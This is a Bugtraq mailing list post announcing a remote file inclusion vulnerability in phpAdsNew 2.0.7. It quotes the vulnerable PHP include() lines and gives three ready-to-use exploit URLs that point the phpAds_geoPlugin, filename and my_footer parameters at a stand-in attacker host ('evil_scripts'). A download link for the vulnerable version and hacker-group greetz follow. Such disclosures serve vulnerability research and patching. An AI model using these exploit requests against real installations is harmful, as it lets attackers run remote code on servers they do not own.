Bugtraq mailing list archives
phpAdsNew 2.0.7 Remote File Include
From: "mr alkomandoz" <k3g () hackermail com>
Date: Sun, 21 Jan 2007 02:22:04 +0800
----------------------------------------------- phpAdsNew 2.0.7 Remote File Include ----------------------------------------------- Author: Alk()mand()z ----------------------------------------------- Vuln Code: include_once ($phpAds_geoPlugin); ....................... function phpAds_ReportGetPluginInfo($filename) { include ($filename); return ($plugin_info_function()); .......................... include ($phpAds_config['my_footer']); ----------------------------------------------- 3xplo!t: phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts? phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts? phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts? ----------------------------------------------- download: http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip ----------------------------------------------- Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team ################################################### AsB-MaT.NeT & D4eG.OrG ################################################### -- _______________________________________________ Get your free email from http://www.hackermail.com
Current thread:
- phpAdsNew 2.0.7 Remote File Include mr alkomandoz (Jan 22)
- <Possible follow-ups>
- Re: phpAdsNew 2.0.7 Remote File Include l . d . 0 (Jan 23)
- Re: phpAdsNew 2.0.7 Remote File Include matteo (Jan 24)